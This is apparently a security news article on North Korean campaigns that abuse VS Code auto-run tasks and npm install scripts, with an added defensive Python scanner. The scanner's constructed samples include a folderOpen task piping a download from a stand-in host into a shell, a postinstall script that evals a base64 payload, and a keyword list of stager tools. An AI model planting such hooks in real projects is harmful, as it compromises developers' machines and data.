Ethical Hacking News
A wave of malware campaigns attributed to North Korea's Contagious Interview group has been detected on GitHub and NPM. The attackers abuse everyday developer tooling to compromise developers and steal cryptocurrency and other sensitive data, with more than $12 million in stolen value so far this year.
Contagious Interview, a North Korean hacking collective, lures developers into cloning malicious GitHub repositories and installing malicious NPM packages. One technique plants a Microsoft Visual Studio Code task configured with "runOn": "folderOpen", so that the malicious command executes as soon as the project folder is opened and trusted in the editor, with no further interaction from the victim. Targets include financial institutions, educational organizations, and members of the public interested in cryptocurrency. Researchers also report that North Korean operators use generative artificial intelligence to build malware loaders intended to evade detection. The total value of cryptocurrency stolen from developers and users stands at over $12 million in the first three months of 2026.
In recent months, cybersecurity researchers have been warning about a sustained wave of malware campaigns from North Korea that abuse developer platforms such as GitHub and NPM, putting individuals and organizations worldwide at risk.
The Contagious Interview group, a North Korean hacking collective known for persistently targeting financial institutions, cryptocurrency exchanges, and educational organizations, has been linked to these recent attacks. Their modus operandi is to lure developers, often through fake job postings, into cloning malware-laced GitHub repositories or installing malicious NPM packages disguised as legitimate software development tools.
According to Proofpoint, a cybersecurity firm that specializes in threat intelligence, the Contagious Interview group has been seeding repositories with Visual Studio Code (VS Code) task definitions that use the tasks.json option "runOptions": {"runOn": "folderOpen"}. VS Code starts such a task automatically whenever the folder is opened in the editor, so the malicious command runs without the victim building, testing, or executing anything. One caveat for defenders: VS Code does not run automatic tasks in a restricted (untrusted) workspace, and the task.allowAutomaticTasks setting can disable them outright, so the attack depends on the developer accepting the workspace-trust prompt for the cloned folder. That single click is the only interaction the attacker needs, and a developer expecting to work on an interview project will usually give it without a second thought.
These campaigns are not limited to organizations; they also target the general public, particularly people interested in cryptocurrency and blockchain technology. In one instance, a malicious NPM package was used to steal data from Telegram users, and another campaign targeted developers running Polymarket trading bots, fingerprinting the host and installing an SSH backdoor.
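Both hooks described above, the VS Code "runOn": "folderOpen" task and the install-time script of a malicious NPM package, can be caught before anything executes by reading the checkout instead of opening it in the editor or running npm install. The scanner below is an added example written for this article; it is not Proofpoint's or any other researcher's tooling. It parses .vscode/tasks.json (which is JSONC, so comments and trailing commas have to be stripped before a standard JSON parser will accept it) for tasks whose runOptions.runOn is folderOpen, and package.json for the lifecycle scripts npm runs automatically during installation, flagging commands that match a small keyword list of fetch-and-execute or decode-and-eval patterns. The two sample files, the example.invalid host and the keyword list are constructed assumptions for the demonstration, not artifacts from the campaign.

```python
"""Scan a freshly cloned checkout for hooks that run code automatically: VS Code tasks
with "runOn": "folderOpen" and npm lifecycle scripts executed by `npm install`."""
import json
import os
import re
import tempfile

# npm runs these script names on its own during `npm install`.
AUTO_RUN_NPM_SCRIPTS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
# Heuristic (assumption): tokens typical of fetch-and-execute or decode-and-eval stagers.
SUSPICIOUS = re.compile(r"curl|wget|base64|Invoke-WebRequest|\biex\b|eval\(|child_process|/dev/tcp|powershell", re.I)

def strip_jsonc(text: str) -> str:
    """tasks.json is JSONC: drop comments outside strings, then trailing commas."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:            # keep the escaped character verbatim
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith(("//", "/*"), i):    # comment outside a string: skip it
            end = "\n" if text[i + 1] == "/" else "*/"
            j = text.find(end, i + 2)
            i = n if j < 0 else (j if end == "\n" else j + 2)
            continue
        else:
            out.append(c)
        i += 1
    # Trailing commas before } or ]. Simplification: would also touch ",}" inside a string.
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))

def vscode_autorun_tasks(tasks_json: str) -> list:
    """Tasks VS Code starts when the folder is opened in a trusted workspace."""
    hits = []
    for task in json.loads(strip_jsonc(tasks_json)).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            cmd = " ".join(str(x) for x in [task.get("command", ""), *task.get("args", [])]).strip()
            hits.append({"label": task.get("label", "<unlabeled>"), "command": cmd,
                         "suspicious": bool(SUSPICIOUS.search(cmd))})
    return hits

def npm_lifecycle_scripts(package_json: str) -> list:
    """package.json scripts npm would execute without being asked."""
    scripts = json.loads(package_json).get("scripts", {})
    return [{"script": name, "command": cmd, "suspicious": bool(SUSPICIOUS.search(cmd))}
            for name, cmd in scripts.items() if name in AUTO_RUN_NPM_SCRIPTS]

def scan_repo(root: str) -> dict:
    """Walk a checkout (skipping node_modules and .git) and collect both kinds of hook."""
    findings = {"vscode_tasks": [], "npm_scripts": [], "errors": []}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in ("node_modules", ".git")]
        targets = []
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            targets.append(("tasks.json", vscode_autorun_tasks, "vscode_tasks"))
        if "package.json" in filenames:
            targets.append(("package.json", npm_lifecycle_scripts, "npm_scripts"))
        for fname, parser, key in targets:
            rel = os.path.normpath(os.path.join(os.path.relpath(dirpath, root), fname))
            try:
                with open(os.path.join(dirpath, fname), encoding="utf-8") as f:
                    findings[key] += [{"path": rel, **hit} for hit in parser(f.read())]
            except ValueError as exc:                  # malformed JSON: report, keep scanning
                findings["errors"].append(f"{rel}: {exc}")
    return findings

# Constructed sample inputs (not real campaign files; example.invalid is a reserved test domain).
SAMPLE_TASKS_JSON = r'''{
  // VS Code accepts comments and trailing commas here, so a plain JSON parser would choke.
  "version": "2.0.0",
  "tasks": [
    { "label": "Install dependencies", "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" }, },
    { "label": "build", "type": "npm", "script": "build" },
  ],
}'''
SAMPLE_PACKAGE_JSON = r'''{ "name": "demo-trading-bot", "version": "1.0.0",
  "scripts": { "postinstall": "node -e \"eval(Buffer.from(process.env.P,'base64').toString())\"",
               "test": "jest" } }'''

def demo() -> dict:
    """Write the constructed samples into a temporary checkout and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, ".vscode"))
        for rel, body in ((".vscode/tasks.json", SAMPLE_TASKS_JSON), ("package.json", SAMPLE_PACKAGE_JSON)):
            with open(os.path.join(root, rel), "w", encoding="utf-8") as f:
                f.write(body)
        return scan_repo(root)

if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run scan_repo against a clone before opening the folder in VS Code or installing its dependencies; a folderOpen task that pipes a download into a shell, or a postinstall script that decodes and evaluates a payload, is the pattern to refuse. The scanner does not look at the tasks section of multi-root *.code-workspace files or at the scripts of transitive dependencies; for the latter, npm install --ignore-scripts blocks lifecycle scripts at install time.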
North Korean operators have also been observed using generative artificial intelligence to produce malware loaders built to evade traditional security controls. In addition, the attackers use fake LinkedIn accounts and job postings to lure victims into installing malicious software.
The total value of cryptocurrency stolen from developers and users as a result of these attacks stands at over $12 million in the first three months of 2026 alone.
The campaigns linked to North Korea have been attributed to several groups, including BlueNoroff (also tracked as Sapphire Sleet and UNC1069), Contagious Interview, and the Lazarus Group. These groups are responsible for a range of high-profile operations, from software supply-chain compromises to phishing.
Separately, research by Yeeth Security identified three malicious VS Code extensions that pose as legitimate productivity tools but contain backdoors. The attackers use such extensions to gain access to developer systems and to turn the victims' own code contributions into infection vectors for downstream developers.
As cybersecurity researchers continue to track the evolution of North Korean malware attacks, it is essential to recognize the importance of staying informed about emerging threats. These attacks highlight the need for increased vigilance and robust security measures in the face of sophisticated cyber threats.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Sophisticated-Threat-Landscape-North-Koreas-Escalating-Malware-Attacks-on-GitHub-and-NPM-ehn.shtml
https://thehackernews.com/2026/06/north-korean-hackers-are-turning.html
Published: Thu Jun 18 00:22:38 2026 by llama3.2 3B Q4_K_M